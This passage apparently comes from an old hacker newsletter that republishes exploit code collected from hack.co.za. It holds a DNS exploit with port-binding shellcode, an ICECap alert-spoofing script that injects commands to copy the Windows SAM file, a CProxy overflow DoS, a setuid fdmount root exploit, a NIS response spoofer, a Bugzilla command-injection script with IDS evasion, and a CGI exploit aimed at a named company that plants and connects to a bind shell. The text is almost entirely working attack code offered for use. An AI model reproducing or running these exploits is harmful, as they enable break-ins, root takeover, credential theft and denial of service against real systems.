libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
tpack + IP_H);
libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
xpbuf, pl_len, tpack + IP_H + UDP_H);
libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);
/* they use "udp and dst port 53" as bpf, so we should have no problem
*/
libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
libnet_close_raw_sock (sock);
printf ("exploitation succeeded.\n");
printf ("try: \"telnet %s 17664\" now.\n", argv[2]);
exit (EXIT_SUCCESS);
}
/* build_xp
*
* build exploit buffer into buffer pointed to by `xp'.
*/
unsigned int
build_xp (unsigned char *xp)
{
int i;
unsigned char buf[1024];
unsigned char shellcode[] =
/* portshell 17644 portshellcode by smiler & scut */
"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char head[] =
"\x07-7350-\x00\xfe";
memcpy (buf, head, 9);
for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
buf[i] = '\x90';
memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
strlen (shellcode));
buf[272] = '\xeb';
buf[273] = '\x08';
buf[274] = (OFFSET ) & 0xff;
buf[275] = (OFFSET >> 8) & 0xff;
buf[276] = (OFFSET >> 16) & 0xff;
buf[277] = (OFFSET >> 24) & 0xff;
memcpy (xp, buf, sizeof (buf));
return (sizeof (buf));;
}
/* www.hack.co.za [19 May]*/
@HWA
257.0 [IND] RFPickaxe.pl winnt remote exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call
$|=1;
use Socket;
###############################################################
# IP of ICECap system (assumes port 8082)
$Target="10.10.200.4";
# account info - uses default 'iceman' w/ no password
$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";
#-------- attributes of the alert ----------
$id="100005";
$issue_name="Exploit";
$sev="1";
# spoof these
$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";
# either fake the MAC, or use it to run commands via JET vulnerability
#$det_mac="0000000000000";
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
"c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";
##############################################################
$inet=inet_aton($Target);
$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;
#path is \program files\network ice\icecap\spatch\en
$alert="accountName=$account&issueID=$id&issueName=$issue_name".
"&severity=$sev&targetNetAddress=$target&targetDNSName=".
"$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
"Name=$det_nbn&detectorMacAddress=$det_mac&".
"intruderNetAddress=$int_ip&detectorType=3&startTime=".
"$time¶meter=$param\r\n";
$len=length($alert);
@DXX=();
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len
EOT
;
$send=~s/\n/\r\n/g;
$send=$send.$alert;
sendraw("$send");
print @DXX;
exit;
sub sendraw { # raw network functions stay in here
my ($pstr)=@_;
$PROTO=getprotobyname('tcp')||0;
# AF_INET=2 SOCK_STREAM=1
eval {
alarm(30);
if(!(socket(S,2,1,$PROTO))){ die("socket");}
if(connect(S,pack "SnA4x8",2,8082,$inet)){
# multi-column perl coding...don't do as I do ;)
select(S); $|=1;
print $pstr;
@DXX=<S>;
select(STDOUT); close(S);
alarm(0); return;
} else { die("not responding"); }
alarm(0);};
if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}
# www.hack.co.za [18 May]#
@HWA
258.0 [IND] cproxy.c winnt remote dos attack by |[TDP]|.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tdp@psynet.net
/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@psynet.net>
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
* Greetings to all the other members and all my friends :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161
void usage(char *progname) {
fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
exit(1);
}
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
if (argc<2) usage(argv[0]);
if (argc>=3) eip+=atol(argv[2]);
if (argc>=4) ebp+=atol(argv[3]);
ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8);
ptr+=sizeof(buffer)-8;
long_ptr=(unsigned long*)ptr;
*(long_ptr++) = ebp;
*(long_ptr++) = eip;
ptr=(char *)long_ptr;
*ptr='\0';
bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}
if ((he = gethostbyname(argv[1])) != NULL) {
ip = *(unsigned long *)he->h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(8080);
fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}
if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
perror("write()");
return -1;
}
fprintf(stderr,"Bye Bye baby!...\n\n");
if (close(sock) < 0) {
perror("close()");
return -1;
}
return(0);
}
/* www.hack.co.za [18 May]*/
@HWA
259.0 [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ronald@grafix.nl
/*
Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent it
is to correct my code and send me a flame.
The fdutils package contains a setuid root file that is used by the floppy
group to mount and unmount floppies. If you are not in this group, this
exploit will not work.
This thingy was tested on Slackware 4.0 and 7.0
Use as: fdmount-exp [offset] [buf size] [valid text ptr]
Since the char * text is overwritten in void errmsg(char *text) we should
make sure that this points to a valid address (something in the .data
section should do perfectly). The hard coded one used works on my box,
to find the one you need use something like:
objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1
The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...
Take care with your newly aquired EUID 0!
Cheers go out to: #phreak.nl #b0f #hit2000 #root66
The year 2000 scriptkiddie award goed to: Gerrie Mansur
Love goes out to: Hester, Maja (you're so cute!), Dopey
-- Yours truly,
Scrippie - ronald@grafix.nl - buffer0verfl0w security
- #phreak.nl
*/
#include <stdio.h>
#define NUM_NOPS 500
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
int buf_size = 71;
int offset=0, i;
char *overflow;
char *ovoff;
long addr, ptr=0x0804c7d0;
if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr);
if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] = '/';
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}
addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff = overflow + strlen(overflow);
for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}
strcpy(ovoff, shellcode);
execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
return 0;
}
/* www.hack.co.za [18 May]*/
@HWA
260.0 [IND] nis-spoof.c remote rpc exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Spoof the response from a NIS server to a client. Be nice, I'm not
* responsible if you do illegal things with this, nor do I condone it. I
* just thought it was interesting and others might as well.
cc `libnet-config --cflags --defines` nis-spoof.c -lpcap \
`libnet-config --libs` -o nis-spoof
Licensed under the terms of the GPL.
$Id: nis-spoof.c,v 1.1.1.1 2000/05/11 23:17:20 tschroed Exp $
See http://www.zweknu.org/src/nis-spoof/ for the latest version
*/
#include <stdio.h>
#include <pcap.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <libnet.h>
#ifdef __OpenBSD__
#include <sys/ioctl.h>
#include <net/bpf.h>
struct pcap {
int fd;
/* Who cares what else is in there? */
};
#endif /* __OpenBSD__ */
/* This simulates the {old|new} pcap_immediate() function. It may not do
* anything on some platforms. */
int my_pcap_immediate(pcap_t *p)
{
/* Thanks to Michael T. Stolarchuk <mts@off.to> for the bit to do this and
* lots of other info besides. */
#ifdef __OpenBSD__
unsigned int value=1;
struct pcap *sp=(struct pcap*)p;
/* I don't know that this jives with what pcap_immediate() is
* supposed to return, but the pcap man page only specifies that
* error == -1 */
return ioctl(sp->fd,BIOCIMMEDIATE,&value);
#else
return -1;
#endif /* __OpenBSD__ */
}
/* I'm making this stuff up. I don't actually *know* the NIS protocol,
* just what I get on a packet dump. */
/* Assume 32 bit arch... */
struct nisquery_st
{
u_int serial;
char dragons[36]; /* I see 86a4 in all the dragons, even on Linux.
I wonder what that's about. */
u_int dom_len;
char domainname[1024];
u_int map_len;
char mapname[1024];
u_int key_len;
char key[1024];
};
/* More guesswork */
char voodoo[]={ 0,0,
0,1,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,
0,0,0,0,0,1};
struct nisresponse_st
{
u_int serial;
char magic[sizeof(voodoo)];
u_int resp_len;
char resp[1024];
};
#define MAC_HEADER_LEN 14
#define PACKET_SIZE 4096
#define PROMISC 1
/***************/
/* Global Vars */
/***************/
struct nisquery_st nq;
struct nisresponse_st nr;
pcap_t *sniffer;
u_short port=0;
char hostname[64],etherdev[64],key[64],map[64],domain[64];
u_char *ippacket;
int rawsock;
/***************/
/***************/
/***************/
void usage(FILE *out,char *name)
{
fprintf(out,"Usage %s -h <host> -p <port> -r <response> -i <interface> "
"-k <key> -m <map> -d <domain>\n",name);
}
void set_options(int argc,char **argv)
{
char ch;
while((ch=getopt(argc, argv, "p:h:r:i:m:d:k:"))!=-1)
{
switch(ch)
{
case 'm':
strncpy(map,optarg,sizeof(map));
map[sizeof(map)-1]=0;
break;
case 'd':
strncpy(domain,optarg,sizeof(domain));
domain[sizeof(domain)-1]=0;
break;
case 'k':
strncpy(key,optarg,sizeof(key));
key[sizeof(key)-1]=0;
break;
case 'p':
port=atoi(optarg);
break;
case 'h':
strncpy(hostname,optarg,sizeof(hostname));
hostname[sizeof(hostname)-1]=0;
break;
case 'i':
strncpy(etherdev,optarg,sizeof(etherdev));
etherdev[sizeof(etherdev)-1]=0;
break;
case 'r':
strncpy(nr.resp,optarg,sizeof(nr.resp));
nr.resp[sizeof(nr.resp)]=0;
nr.resp_len=strlen(nr.resp);
nr.resp_len=htonl(nr.resp_len);
break;
case '?':
default:
usage(stderr,argv[0]);
exit(1);
}
}
}
/*
int open_rawsock(void)
{
int rawsock,val=1;
if((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)
{
perror("socket");
exit(1);
}
if(setsockopt(rawsock,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0)
{
perror("setsockopt");
exit(1);
}
return rawsock;
}
*/
int open_rawsock(void)
{
int rawsock;
if(libnet_init_packet(PACKET_SIZE,&ippacket)==-1)
{
perror("libnet_init_packet");
exit(1);
}
if((rawsock=libnet_open_raw_sock(IPPROTO_RAW))==-1)
{
perror("libnet_open_raw_sock");
exit(1);
}
return rawsock;
}
pcap_t *open_sniffer(void)
{
char filterstr[1024],errbuf[4096];
pcap_t *capdev;
struct bpf_program filter;
int localnet=0,netmask=0;
sprintf(filterstr,"dst host %s and udp and dst port %d",hostname,port);
printf("Filter: \"%s\"\n",filterstr);
if((capdev=pcap_open_live(etherdev,PACKET_SIZE,PROMISC,1,errbuf))==NULL)
{
fprintf(stderr,"pcap_open_live: %s\n",errbuf);
exit(1);
}
if(pcap_lookupnet(etherdev,&localnet,&netmask,errbuf))
{
fprintf(stderr,"pcap_lookupnet: %s\n",errbuf);
exit(1);
}
if(pcap_compile(capdev,&filter,filterstr,1,netmask))
{
pcap_perror(capdev,"pcap_compile");
exit(1);
}
if(pcap_setfilter(capdev,&filter))
{
pcap_perror(capdev,"pcap_setfilter");
exit(1);
}
my_pcap_immediate(capdev);
return capdev;
}
/* Send a response to buf */
void send_response(char *buf,int len)
{
int i;
u_char ihl=4*(0xF&(u_char)buf[MAC_HEADER_LEN]);
u_char scratch[4];
u_short tlen,rlen,payload_len;
buf+=MAC_HEADER_LEN;
rlen=0xFFFF&(ntohl(nr.resp_len) +
((ntohl(nr.resp_len)%4)?4-(ntohl(nr.resp_len)%4):0));
bzero(ippacket,sizeof(ippacket));
nr.serial=nq.serial;
bcopy(buf,ippacket,len);
/* printf("##############################################\n"); */
payload_len=sizeof(nr)-sizeof(nr.resp)+rlen;
bcopy(&nr,ippacket+len,payload_len);
tlen=len+payload_len;
/*
for(i=0;i<tlen;i++)
printf("%c%2.2x",i%16?' ':'\n',ippacket[i]);
printf("\n");
*/
tlen=htons(tlen);
/* Set total length */
bcopy(&tlen,&ippacket[2],2);
/* Set TTL */
ippacket[8]=24;
/* Swap IP src/dst */
bcopy(&ippacket[12],scratch,4);
bcopy(&ippacket[16],&ippacket[12],4);
bcopy(scratch,&ippacket[16],4);
/* Swap port src/dst */
bcopy(&ippacket[ihl],scratch,2);
bcopy(&ippacket[ihl+2],&ippacket[ihl],2);
bcopy(scratch,&ippacket[ihl+2],2);
/* Set UDP len */
payload_len+=8;
payload_len=htons(payload_len);
bcopy(&payload_len,&ippacket[ihl+4],2);
tlen=ntohs(tlen);
if(libnet_do_checksum(ippacket,IPPROTO_UDP,tlen-ihl)<0)
{
perror("libnet_do_checksum");
exit(1);
}
/*
for(i=0;i<tlen;i++)
printf("%c%2.2x",i%16?' ':'\n',ippacket[i]);
printf("\n");
*/
libnet_write_ip(rawsock,ippacket,tlen);
}
void framehandler(u_char *user, struct pcap_pkthdr *ph, u_char *buf)
{
/* Let's assume a 14-byte MAC header!! :) Data offset = 14 + IHL*4
* + 8 */
u_char dataoffset=MAC_HEADER_LEN+4*(0xF&(u_char)buf[MAC_HEADER_LEN])+8;
u_short datalen=ntohs((*(u_short *)&(buf[dataoffset-4]))&0xFFFF)-8;
u_short curpos;
int i=0;
/* printf("Offset: %d\nLength: %2.2x\n\n",dataoffset,datalen); */
bzero(&nq,sizeof(nq));
bcopy(&buf[dataoffset],&nq.serial,4);
curpos=dataoffset+4;
bcopy(&buf[curpos],&nq.dragons,sizeof(nq.dragons));
curpos+=sizeof(nq.dragons);
nq.dom_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.domainname,nq.dom_len);
curpos+=nq.dom_len;
if(nq.dom_len%4)
curpos+=4-(nq.dom_len%4);
nq.domainname[nq.dom_len]=0;
nq.map_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.mapname,nq.map_len);
curpos+=nq.map_len;
if(nq.map_len%4)
curpos+=4-(nq.map_len%4);
nq.mapname[nq.map_len]=0;
nq.key_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.key,nq.key_len);
curpos+=nq.key_len;
if(nq.key_len%4)
curpos+=4-(nq.key_len%4);
nq.key[nq.key_len]=0;
if(!strcmp(nq.key,key) &&
!strcmp(nq.mapname,map) &&
!strcmp(nq.domainname,domain))
{
fprintf(stderr,"Match: %s %s [%s]\n"
,nq.key,nq.mapname,nq.domainname);
send_response(buf,dataoffset-14);
}
}
int main(int argc, char **argv)
{
set_options(argc,argv);
if(hostname[0]==0 || port==0 || etherdev[0]==0 || nr.resp_len==0
|| key[0]==0 || map[0]==0 || domain[0]==0)
{
printf("Hostname: %s\n",hostname);
printf("Port: %d\n",port);
printf("Interface: %s\n",etherdev);
printf("Response: %s\n",nr.resp);
usage(stderr,argv[0]);
exit(1);
}
sniffer=open_sniffer();
rawsock=open_rawsock();
printf("Answering queries for %s:%d\n",hostname,port);
bcopy(voodoo,&nr.magic,sizeof(voodoo));
pcap_loop(sniffer,0,framehandler,NULL);
return 0;
}
/* www.hack.co.za [14 May]*/
@HWA
261.0 [IND] bugzilla.pl remote cgi exploit by karin.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
karin@root66.nl.eu.org
#!/usr/bin/perl
# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# RooT66 - http://root66.nl.eu.org
# ShellOracle - http://www.shelloracle.cjb.net
# b0f - http://b0f.freebsd.lublin.pl
#
# This exploits uses antiIDS tricks ripped from whisker
#
# next 2 functinos stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
my $str,$c;
$drift=(rand() * 10) % 10;
for($c=0;$c<10+$drift;$c++){
$str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
return $str;}
sub antiIDS {
($url) = (@_);
$url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
$url =~ s/\ /+/g;
$url =~s/\//\/.\//g;
return $url;
}
#end of stolen stuff
($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);
print("Exploit for Bugzilla up to version 2.8\n");
print(" by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66 - http://root66.nl.eu.org\n");
print("ShellOracle - http://www.shelloracle.cjb.net\n");
print("b0f - http://b0f.freebsd.lublin.pl\n");
print("\n");
if ($complete_url eq "-h" || $complete_url eq "--help") {
print("Usage: $0 url emailaddress password command\n");
exit;
}
# Get information of user
if (!$complete_url) {
print("URL: ");
$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
print("EMAIL: ");
$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
print("PASSWORD: ");
$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
print("COMMAND: ");
$command = <STDIN>; chomp($command);
}
# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;
# Make own directory
system("mkdir $");
print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
if ($input =~ /enter_bug.cgi\?product=/) {
chomp($input);
$product = $input;
$product =~ s/.*product=//;
$product =~ s/".*//;
if ($product =~ /\&component=/) {
$component = $product;
$product =~ s/&.*//; # strip component
$component =~ s/.*component=//;
$component =~ s/".*//;
}
}
}
print("\tProduct: $product\n");
if ($component) {
print("\tComponent: $component\n");
}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /Reporter:/) {
$reporter = $input;
$reporter =~ s/.*Reporter: //;
$reporter =~ s/\ .*//;
}
if ($input =~ /Version:/) {
$version = $input;
$version =~ s/.*Version: \[//;
$version =~ s/\.*\].*//;
}
if ($input =~ /Component:/) {
$component = $input;
$component =~ s/.*Component: \[//;
$component =~ s/\.*\].*//;
}
if ($input =~ /Platform:/) {
$platform = $input;
$platform =~ s/.*Platform: \[//;
$platform =~ s/\.*\].*//;
}
if ($input =~ /OS:/) {
$os = $input;
$os =~ s/.*OS: \[//;
$os =~ s/\.*\].*//;
}
if ($input =~ /Priority:/) {
$priority = $input;
$priority =~ s/.*Priority: \[//;
$priority =~ s/\].*//;
}
if ($input =~ /Severity:/) {
$severity = $input;
$severity =~ s/.*Severity: \[//;
$severity =~ s/\.*\].*//;
}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);
#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $; lynx -dump \"$host/$page\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /END OUTPUT COMMAND/) {
$startoutput = 0;
}
if ($startoutput) {
print("$input\n");
}
if ($input =~ /START OUTPUT COMMAND/) {
$startoutput = 1;
}
}
close(FILE);
# Delete shit
system("rm -rf $");
# www.hack.co.za [10 May]#
@HWA
262.0 [IND] netsol.c remote cgi exploit by bansh33.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rishi@felons.org
/*
* [r00tabega.security.labs]
* www.r00tabega.com
* Coded for the network solutions exploit (http://packetstorm.securify.com/0005-exploits/netsolbug.txt)
* Unfortunately, this no longer works.
* coded by bansh33 [rishi@felons.org]
* Binds a shell to port 31337
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <time.h>
#include <sys/time.h>
#include <unistd.h>
#define TRUE 0x00000001
#define FALSE 0x00000000
#define ERR 0xffffffff
typedef long sock_t;
typedef u_long ip_t;
typedef u_short port_t;
#define H1 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c|"
#define H2 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c"
#define CODE "GET /cgi-bin/phf?Qalias=x%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c|"
#define COMPILE "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0agcc%20-o%20hi%20hi.c|"
#define THEHACK "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0a%2e%2f%68%69%20|"
#define WHOAMI "uname -a; id;\n"
int main (int, char * *);
void simshell (int);
void send_tcp_conn (char *, ip_t, port_t, int);
sock_t tcp_conn (ip_t, port_t);
ip_t resolve (u_char *);
int main (int argc, char * * argv)
{
sock_t fd;
ip_t ipaddr;
if ((ipaddr = resolve("networksolutions.com")) == ERR)
{
fprintf(stderr, "Couldn't resolve networksolutions.com.\n");
exit(EXIT_SUCCESS);
}
fprintf(stderr, "Network Solutions Exploit by bansh33\n");
fprintf(stderr, "i take no responsibility for this\n\n");
fprintf(stderr, "Owning networksolutions.com: ");
send_tcp_conn(H1, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(H2, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(CODE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(COMPILE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(THEHACK, ipaddr, 80, 1);
fprintf(stderr, ".");
fprintf(stderr, "\nDropping you to a shell...\n");
fd = tcp_conn(ipaddr, 31337);
send(fd, WHOAMI, strlen(WHOAMI), 0);
simshell(fd);
}
void simshell (int fd)
{
char buf[255];
fd_set in_set;
while (1)
{
FD_ZERO(&in_set);
FD_SET(0, &in_set);
FD_SET(fd, &in_set);
if ((select(fd + 1, &in_set, 0, 0, NULL)))
{
if (FD_ISSET(fd, &in_set))
{
memset(buf, 0, 255);
recv(fd, buf, 255, 0);
if (!*buf) exit(EXIT_SUCCESS);
fprintf(stderr, buf);
}
else if (FD_ISSET(0, &in_set))
{
memset(buf, 0, 255);
read(0, buf, 255);
send(fd, buf, strlen(buf), 0);
}
}
}
}
void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis)
{
sock_t fd;
if ((fd = tcp_conn(ipaddr, port)) > 0)
send(fd, buf, strlen(buf), 0);
